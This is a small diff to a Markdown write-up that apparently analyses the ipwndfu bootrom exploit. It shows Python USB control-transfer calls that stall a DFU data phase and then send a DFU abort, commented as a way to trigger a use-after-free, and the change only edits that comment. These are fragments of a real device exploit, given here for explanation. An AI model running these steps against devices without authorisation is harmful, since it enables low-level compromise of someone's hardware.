alfiecg24/Achilles/docs/Write-ups/ipwndfuAnalysis.md

     # Create an incomplete data phase transfer
     libusb1_async_ctrl_transfer(device, 0x21, 1, 0, 0, b'A' * 0x800, 0.0001)

-    # DFU abort to cause re-entry and trigger UaF
+    # DFU abort to cause re-entry and trigger UaF, also a ZLP
     libusb1_no_error_ctrl_transfer(device, 0x21, 4, 0, 0, 0, 0)

     # Release and give time to re-enter DFU